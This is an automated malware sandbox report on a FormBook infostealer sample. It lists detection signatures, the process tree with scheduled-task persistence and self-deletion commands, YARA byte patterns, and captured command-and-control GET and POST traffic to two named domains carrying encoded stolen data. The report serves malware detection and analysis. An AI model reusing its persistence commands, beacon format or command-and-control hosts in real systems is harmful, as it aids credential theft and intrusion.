Play interactive tourEdit tour

# Analysis Report CN03716-20.exe

## Overview

### General Information

 Sample Name: CN03716-20.exe Analysis ID: 288109 MD5: b29ab9daeda57a7b9494bf50e37b556c SHA1: c97d6f7ebda204b6411a00e8fb3b4fd80e62cc33 SHA256: 9cd82d6a35b48112a4e99f0cbdbd3a18df7738082d7f40f24274debfc5688ec4 Tags: exeFormBook Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

 System is w10x64CN03716-20.exe (PID: 5260 cmdline: 'C:\Users\user\Desktop\CN03716-20.exe' MD5: B29AB9DAEDA57A7B9494BF50E37B556C)schtasks.exe (PID: 5172 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\QZblaErkmXlkhK' /XML 'C:\Users\user\AppData\Local\Temp\tmpA242.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)CN03716-20.exe (PID: 4356 cmdline: C:\Users\user\Desktop\CN03716-20.exe MD5: B29AB9DAEDA57A7B9494BF50E37B556C)explorer.exe (PID: 3368 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)control.exe (PID: 6584 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)cmd.exe (PID: 6872 cmdline: /c del 'C:\Users\user\Desktop\CN03716-20.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 6884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)srmdufw81bmhwhwh.exe (PID: 4956 cmdline: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe MD5: B29AB9DAEDA57A7B9494BF50E37B556C)schtasks.exe (PID: 6372 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\QZblaErkmXlkhK' /XML 'C:\Users\user\AppData\Local\Temp\tmp2A88.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)conhost.exe (PID: 6352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)srmdufw81bmhwhwh.exe (PID: 6420 cmdline: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe MD5: B29AB9DAEDA57A7B9494BF50E37B556C)srmdufw81bmhwhwh.exe (PID: 6408 cmdline: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe MD5: B29AB9DAEDA57A7B9494BF50E37B556C)cmstp.exe (PID: 1548 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)cleanup

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
0000001A.00000002.504807087.00000000033F9000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98d8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b42:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa55a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb253:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b267:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c26a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18349:\$sqlite3step: 68 34 1C 7B E1
• 0x1845c:\$sqlite3step: 68 34 1C 7B E1
• 0x18378:\$sqlite3text: 68 38 2A 90 C5
• 0x1849d:\$sqlite3text: 68 38 2A 90 C5
• 0x1838b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x184b3:\$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
Click to see the 37 entries
SourceRuleDescriptionAuthorStrings
30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98d8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b42:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa55a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb253:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b267:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c26a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18349:\$sqlite3step: 68 34 1C 7B E1
• 0x1845c:\$sqlite3step: 68 34 1C 7B E1
• 0x18378:\$sqlite3text: 68 38 2A 90 C5
• 0x1849d:\$sqlite3text: 68 38 2A 90 C5
• 0x1838b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x184b3:\$sqlite3blob: 68 53 D8 7F 8C
30.2.srmdufw81bmhwhwh.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
30.2.srmdufw81bmhwhwh.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x8ad8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8d42:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x14875:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14361:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14977:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x14aef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x975a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x135dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa453:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1a467:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1b46a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 7 entries

## Sigma Overview

### System Summary:

 Sigma detected: Scheduled temp file as task from temp location Show sources

## Signature Overview

### AV Detection:

 Antivirus / Scanner detection for submitted sample Show sources
 Source: CN03716-20.exe Avira: detected
 Antivirus detection for URL or domain Show sources
 Source: http://www.esanjor.online/cmg/?M694-=yVIXBz1P&BB=CmTltWFTvy3EJlg4TEqBBLn9+8OjC9fpBSds7xERVBMYuIjPQpcJ/EVqARb7a9JaL//732yiKA== Avira URL Cloud: Label: malware
 Antivirus detection for dropped file Show sources
 Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exe Avira: detection malicious, Label: TR/AD.Swotter.iznqo Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe Avira: detection malicious, Label: TR/AD.Swotter.iznqo Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe Avira: detection malicious, Label: TR/AD.Swotter.iznqo
 Multi AV Scanner detection for dropped file Show sources
 Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe Virustotal: Detection: 27% Perma Link Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe Metadefender: Detection: 13% Perma Link Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe ReversingLabs: Detection: 31% Source: C:\Users\user\AppData\Local\Temp\Iw6qlizi\srmdufw81bmhwhwh.exe Virustotal: Detection: 27% Perma Link Source: C:\Users\user\AppData\Local\Temp\Iw6qlizi\srmdufw81bmhwhwh.exe Metadefender: Detection: 13% Perma Link Source: C:\Users\user\AppData\Local\Temp\Iw6qlizi\srmdufw81bmhwhwh.exe ReversingLabs: Detection: 31% Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exe Virustotal: Detection: 27% Perma Link Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exe Metadefender: Detection: 13% Perma Link Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exe ReversingLabs: Detection: 31%
 Multi AV Scanner detection for submitted file Show sources
 Source: CN03716-20.exe Virustotal: Detection: 27% Perma Link Source: CN03716-20.exe Metadefender: Detection: 13% Perma Link Source: CN03716-20.exe ReversingLabs: Detection: 31%
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.524514426.0000000004290000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000007.00000002.340698875.0000000001920000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001E.00000002.514282839.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001A.00000002.505322558.0000000004399000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.524572996.00000000042C0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001E.00000002.512975825.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001E.00000002.515119349.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.519397302.00000000004D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001F.00000002.516896935.0000000002800000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.290869123.0000000003EA9000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 7.2.CN03716-20.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 7.2.CN03716-20.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Machine Learning detection for dropped file Show sources
 Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exe Joe Sandbox ML: detected Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe Joe Sandbox ML: detected Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe Joe Sandbox ML: detected
 Machine Learning detection for sample Show sources
 Source: CN03716-20.exe Joe Sandbox ML: detected
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 7.2.CN03716-20.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /cmg/?M694-=yVIXBz1P&BB=CmTltWFTvy3EJlg4TEqBBLn9+8OjC9fpBSds7xERVBMYuIjPQpcJ/EVqARb7a9JaL//732yiKA== HTTP/1.1Host: www.esanjor.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cmg/?BB=5/1mjjR4mGjOAvq4NnaV6etpsB6KL9PtiQNF/4xJREY1Y/y+fGAvCK0i83oyWJ1COzWQaYhpTQ==&M694-=yVIXBz1P HTTP/1.1Host: www.lifecoachwoman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 35.242.251.130 35.242.251.130 Source: Joe Sandbox View IP Address: 35.242.251.130 35.242.251.130 Source: Joe Sandbox View IP Address: 52.0.217.44 52.0.217.44
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS Source: Joe Sandbox View ASN Name: AMAZON-AESUS AMAZON-AESUS
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /cmg/ HTTP/1.1Host: www.lifecoachwoman.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.lifecoachwoman.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lifecoachwoman.com/cmg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 42 3d 78 64 35 63 39 48 78 33 34 30 50 78 5a 66 71 32 62 67 48 4a 76 5a 77 48 37 7a 4b 4e 63 4f 6a 47 6d 33 6b 67 38 72 64 5f 63 78 73 57 58 73 6d 79 64 6d 39 47 45 61 67 68 38 55 34 4b 51 61 59 52 45 44 69 64 61 35 46 41 61 6f 38 65 75 43 51 5a 4c 44 72 52 39 41 62 59 6e 67 36 50 38 54 58 34 43 71 4b 74 52 72 47 5a 63 64 38 30 41 7a 74 62 70 49 42 62 6c 71 57 49 50 47 48 4f 56 43 36 57 4a 56 50 5f 53 37 31 43 65 64 71 63 48 5f 6a 34 64 39 68 79 45 63 56 44 55 64 52 64 41 2d 70 70 6d 73 77 6a 74 4c 52 65 58 5f 6f 74 42 78 4c 79 71 4f 77 75 56 74 38 58 37 74 33 4a 6a 4c 7e 4a 61 55 43 46 74 65 69 46 34 71 28 5f 6b 77 46 56 6d 49 4a 57 39 36 7a 35 57 48 4e 53 53 54 6a 48 55 55 36 47 6d 39 66 63 4d 65 32 71 52 4d 70 73 4c 71 59 54 61 4a 37 64 71 50 30 59 4b 36 42 78 6b 67 75 66 43 73 46 4c 74 32 73 58 28 77 32 4a 4f 67 53 6e 77 34 72 53 66 51 75 65 31 35 35 38 64 49 46 48 67 4c 32 67 6f 67 41 4b 58 50 4c 66 6a 70 78 50 37 31 6b 4f 75 6c 6c 71 49 38 35 67 45 61 45 6a 39 62 72 34 36 66 6e 70 4a 4e 4b 70 28 36 58 53 7e 4f 6a 4d 4f 46 54 5f 46 2d 6e 65 35 4a 70 44 78 45 43 39 39 68 6b 4b 41 6e 56 45 50 37 6c 68 78 5a 51 59 50 56 39 54 46 77 56 38 32 43 6e 37 36 5a 39 39 63 68 6a 54 57 75 42 74 65 6f 51 73 73 54 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: BB=xd5c9Hx340PxZfq2bgHJvZwH7zKNcOjGm3kg8rd_cxsWXsmydm9GEagh8U4KQaYREDida5FAao8euCQZLDrR9AbYng6P8TX4CqKtRrGZcd80AztbpIBblqWIPGHOVC6WJVP_S71CedqcH_j4d9hyEcVDUdRdA-ppmswjtLReX_otBxLyqOwuVt8X7t3JjL~JaUCFteiF4q(_kwFVmIJW96z5WHNSSTjHUU6Gm9fcMe2qRMpsLqYTaJ7dqP0YK6BxkgufCsFLt2sX(w2JOgSnw4rSfQue1558dIFHgL2gogAKXPLfjpxP71kOullqI85gEaEj9br46fnpJNKp(6XS~OjMOFT_F-ne5JpDxEC99hkKAnVEP7lhxZQYPV9TFwV82Cn76Z99chjTWuBteoQssTo. Source: global traffic HTTP traffic detected: POST /cmg/ HTTP/1.1Host: www.lifecoachwoman.comConnection: closeContent-Length: 165896Cache-Control: no-cacheOrigin: http://www.lifecoachwoman.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lifecoachwoman.com/cmg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 42 3d 78 64 35 63 39 44 74 6b 36 6b 4c 67 64 74 4f 31 61 77 58 52 6c 35 42 49 71 45 53 67 4d 70 58 30 34 30 67 77 38 72 42 7a 51 55 77 45 64 73 57 79 66 6b 46 42 51 4b 67 67 6f 6b 34 4a 55 61 56 6f 59 69 47 6a 61 34 52 6d 61 6f 45 5a 67 6b 30 63 49 54 72 47 38 67 58 53 68 67 65 59 38 57 66 6e 43 4f 75 31 55 72 4b 5a 54 4a 70 79 4d 79 39 4d 75 4a 4e 49 6d 61 62 41 63 79 61 65 56 79 57 45 49 33 7a 6e 62 61 70 41 63 65 32 54 62 4b 72 41 58 4e 5a 70 4b 73 41 4c 59 2d 74 43 46 64 63 42 79 4a 52 44 69 70 70 64 49 66 77 6a 47 32 33 4d 76 5f 45 58 46 74 74 75 37 71 72 34 75 64 47 55 65 55 75 4e 76 76 66 51 7a 37 37 35 68 7a 63 49 73 75 39 6e 37 36 44 47 4a 54 41 41 42 54 4f 48 41 33 54 4e 35 50 76 33 4f 76 36 6d 61 64 31 55 4b 64 34 62 57 70 4b 50 67 73 56 41 45 4f 78 35 77 44 43 74 61 73 46 67 67 57 74 46 6e 79 65 78 65 54 7e 38 6e 74 6a 37 55 7a 4f 4f 74 49 45 69 61 4e 5a 78 39 35 4c 47 71 52 67 65 64 72 6e 6e 6e 4b 39 2d 38 43 55 69 77 31 6c 4e 49 34 41 75 45 61 46 53 39 61 71 58 37 72 50 70 4b 38 72 7a 72 34 28 67 70 65 6a 52 4d 56 44 35 50 70 48 77 35 49 4e 44 6a 68 7e 58 76 6e 6b 4b 58 45 39 48 4f 65 52 68 79 70 51 59 44 31 38 79 4e 53 64 7a 37 32 72 64 7a 37 56 66 62 53 66 38 64 75 5a 41 61 36 70 73 36 55 76 34 6e 36 33 78 28 2d 49 34 64 4e 71 66 6b 37 56 6e 38 49 57 46 4a 30 34 71 45 41 33 73 39 64 69 78 65 39 35 6e 7a 6b 57 55 30 5a 39 59 7a 31 4c 45 55 34 69 72 57 34 79 65 42 6c 68 7a 4a 36 76 69 4c 36 44 37 67 71 73 53 47 67 71 6a 46 30 4e 71 73 54 75 30 43 43 6f 49 4a 4b 43 47 35 64 74 65 48 49 4a 33 61 75 33 30 6c 77 57 34 4d 53 61 35 43 32 43 43 6e 45 49 32 43 53 4e 34 34 6b 46 65 77 65 32 4e 54 47 56 73 48 65 7e 63 6f 4a 6e 4e 50 38 52 64 68 51 48 48 54 78 72 6b 48 76 61 61 79 64 6f 35 4e 41 76 2d 35 51 44 4e 48 33 34 59 36 61 32 56 69 43 57 4e 4e 42 6d 73 73 4f 66 35 55 5f 50 39 58 41 4b 54 53 39 61 50 76 36 43 42 64 44 6d 62 4e 66 4c 77 67 6d 71 44 4b 41 4f 65 36 6c 49 35 6c 41 46 67 72 6f 55 64 41 38 71 39 76 51 6d 45 63 46 4c 79 4a 71 58 6c 7e 4a 52 34 52 53 51 72 47 66 67 32 48 4b 75 4d 39 73 7a 66 6e 5f 75 33 58 5a 4f 50 74 43 6e 4d 59 33 30 54 55 34 4b 50 4c 6b 59 64 6e 59 72 44 4f 4f 4e 7a 46 59 32 35 51 41 73 45 6b 52 6a 75 54 55 4f 54 43 2d 44 41 77 61 70 43 6f 46 30 50 48 37 39 6f 4d 43 77 73 58 39 4c 5f 66 70 59 37 31 72 4e 6e 79 74 46 61 57 73 74 4c 55 4f 28 52 4e 36 7a 62 4a 63 43 4e 54 41 6a 47 46 52 42 42 57 56 38 53 65 36 58 66 4d 6e 4a 4e 4d 53 65 5a 71 41 62 62 4c 30 43 66 65 6d 4c 46 6e 6c 6b 4e 76 67 50 31 35 70 4c 44 48 39 72 6a 42 67 51 52 67 62 64 67 57 47 28 61 51 33 4a 48 34 43 50 39 51 52 34 71 30 7
 Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Sep 2020 14:47:30 GMTConnection: closeContent-Length: 485Content-Encoding: gzipX-Frame-Options: SAMEORIGINCache-Control: private, no-cache, no-store, max-age=0Expires: Mon, 01 Jan 1990 0:00:00 GMTData Raw: 1f 8b 08 00 00 00 00 00 00 00 95 52 d1 6e d3 30 14 7d ef 57 78 46 e2 85 3a 4e 69 d1 46 9b 04 89 76 12 93 06 9b 46 10 e2 09 39 c9 4d e2 cd b1 83 7d 9b ac 7f 8f 93 54 5b b5 3d 20 9e ac 7b ee 39 c7 be c7 37 3a db dd 6c d3 5f b7 97 e4 4b fa f5 9a dc fe f8 7c 7d b5 25 94 71 fe 73 b9 e5 7c 97 ee a6 c6 2a 08 17 24 b5 42 3b 89 d2 68 a1 38 bf fc 46 09 ad 11 db 35 e7 7d df 07 fd 32 30 b6 e2 e9 1d af b1 51 2b ae 8c 71 10 14 58 d0 64 16 0d 10 79 6c 94 76 eb 32 8b 4f 65 a5 c8 21 33 e6 21 c8 4d c3 df 87 e1 05 2f b3 46 d1 23 d9 54 4f 64 53 b5 41 03 5c bb 37 a3 21 88 c2 1f 0d a0 20 03 81 c1 9f bd ec 62 ba 35 1a 41 23 4b 0f 2d 50 92 4f 55 4c 11 1e 71 7c d7 86 e4 b5 b0 0e 30 de 63 c9 2e 68 32 59 68 d1 40 4c 3b 09 7d 6b 2c 9e 08 7b 59 60 1d 17 d0 c9 1c d8 58 cc 89 d4 3e 04 a1 98 cb 85 82 78 31 27 7b 07 76 ac 44 e6 01 6d 88 ab ad d4 0f 0c 0d 2b 25 7a c0 5f 83 12 15 24 6f 75 e6 da 4d c4 a7 2a 52 9e 45 6a 0b e5 d3 94 32 c8 0b dd 0a 3b e5 81 35 34 e0 b8 85 4a 3a b4 c2 f2 f3 8f 8b 45 f8 21 c8 9d a3 c4 82 8a a9 c3 83 02 57 03 20 7d 65 e7 bc 5f e9 07 71 41 65 4c a5 40 b4 d2 8d b6 5e fe a9 14 8d 54 87 f8 a6 05 fd ee bb ff d7 f5 2a 0c e7 e7 61 f8 da 97 a0 cf f2 18 e1 70 71 12 f1 63 fa 99 29 0e 49 e4 72 2b 5b 3c 65 dd 8b 4e 4c a8 27 9f 31 36 eb 84 25 f9 90 31 89 09 9d 66 a0 9b 01 94 85 4f 59 96 12 ec d0 a1 9b 19 63 de 7e d2 fe c3 99 38 9b c7 f4 65 62 cf 51 75 4b bf 82 a2 00 1b dc 8f 6f fe 1f d3 ba fd 3d 01 2f b4 7c 9a 78 dc a4 64 f6 17 4c d4 8a 78 3d 03 00 00 Data Ascii: Rn0}WxF:NiFvF9M}T[= {97:l_K|}%qs|*\$B;h8F5}20Q+qXdylv2Oe!3!M/F#TOdSA\7! b5A#K-POULq|0c.h2Yh@L;}k,{Y`X>x1'{vDm+%z_\$ouM*REj2;54J:E!W }e_qAeL@^T*apqc)Ir+[x1'{vDm+%z_\$ouM*REj2;54J:E!W }e_qAeL@^T*apqc)Ir+[
 Source: global traffic HTTP traffic detected: GET /cmg/?M694-=yVIXBz1P&BB=CmTltWFTvy3EJlg4TEqBBLn9+8OjC9fpBSds7xERVBMYuIjPQpcJ/EVqARb7a9JaL//732yiKA== HTTP/1.1Host: www.esanjor.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /cmg/?BB=5/1mjjR4mGjOAvq4NnaV6etpsB6KL9PtiQNF/4xJREY1Y/y+fGAvCK0i83oyWJ1COzWQaYhpTQ==&M694-=yVIXBz1P HTTP/1.1Host: www.lifecoachwoman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Found strings which match to known social media urls Show sources
 Source: control.exe, 00000010.00000002.529660128.0000000004E9F000.00000004.00000001.sdmp String found in binary or memory: equals www.facebook.com (Facebook)
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: cdn.onenote.net
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /cmg/ HTTP/1.1Host: www.lifecoachwoman.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.lifecoachwoman.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lifecoachwoman.com/cmg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 42 3d 78 64 35 63 39 48 78 33 34 30 50 78 5a 66 71 32 62 67 48 4a 76 5a 77 48 37 7a 4b 4e 63 4f 6a 47 6d 33 6b 67 38 72 64 5f 63 78 73 57 58 73 6d 79 64 6d 39 47 45 61 67 68 38 55 34 4b 51 61 59 52 45 44 69 64 61 35 46 41 61 6f 38 65 75 43 51 5a 4c 44 72 52 39 41 62 59 6e 67 36 50 38 54 58 34 43 71 4b 74 52 72 47 5a 63 64 38 30 41 7a 74 62 70 49 42 62 6c 71 57 49 50 47 48 4f 56 43 36 57 4a 56 50 5f 53 37 31 43 65 64 71 63 48 5f 6a 34 64 39 68 79 45 63 56 44 55 64 52 64 41 2d 70 70 6d 73 77 6a 74 4c 52 65 58 5f 6f 74 42 78 4c 79 71 4f 77 75 56 74 38 58 37 74 33 4a 6a 4c 7e 4a 61 55 43 46 74 65 69 46 34 71 28 5f 6b 77 46 56 6d 49 4a 57 39 36 7a 35 57 48 4e 53 53 54 6a 48 55 55 36 47 6d 39 66 63 4d 65 32 71 52 4d 70 73 4c 71 59 54 61 4a 37 64 71 50 30 59 4b 36 42 78 6b 67 75 66 43 73 46 4c 74 32 73 58 28 77 32 4a 4f 67 53 6e 77 34 72 53 66 51 75 65 31 35 35 38 64 49 46 48 67 4c 32 67 6f 67 41 4b 58 50 4c 66 6a 70 78 50 37 31 6b 4f 75 6c 6c 71 49 38 35 67 45 61 45 6a 39 62 72 34 36 66 6e 70 4a 4e 4b 70 28 36 58 53 7e 4f 6a 4d 4f 46 54 5f 46 2d 6e 65 35 4a 70 44 78 45 43 39 39 68 6b 4b 41 6e 56 45 50 37 6c 68 78 5a 51 59 50 56 39 54 46 77 56 38 32 43 6e 37 36 5a 39 39 63 68 6a 54 57 75 42 74 65 6f 51 73 73 54 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: BB=xd5c9Hx340PxZfq2bgHJvZwH7zKNcOjGm3kg8rd_cxsWXsmydm9GEagh8U4KQaYREDida5FAao8euCQZLDrR9AbYng6P8TX4CqKtRrGZcd80AztbpIBblqWIPGHOVC6WJVP_S71CedqcH_j4d9hyEcVDUdRdA-ppmswjtLReX_otBxLyqOwuVt8X7t3JjL~JaUCFteiF4q(_kwFVmIJW96z5WHNSSTjHUU6Gm9fcMe2qRMpsLqYTaJ7dqP0YK6BxkgufCsFLt2sX(w2JOgSnw4rSfQue1558dIFHgL2gogAKXPLfjpxP71kOullqI85gEaEj9br46fnpJNKp(6XS~OjMOFT_F-ne5JpDxEC99hkKAnVEP7lhxZQYPV9TFwV82Cn76Z99chjTWuBteoQssTo.
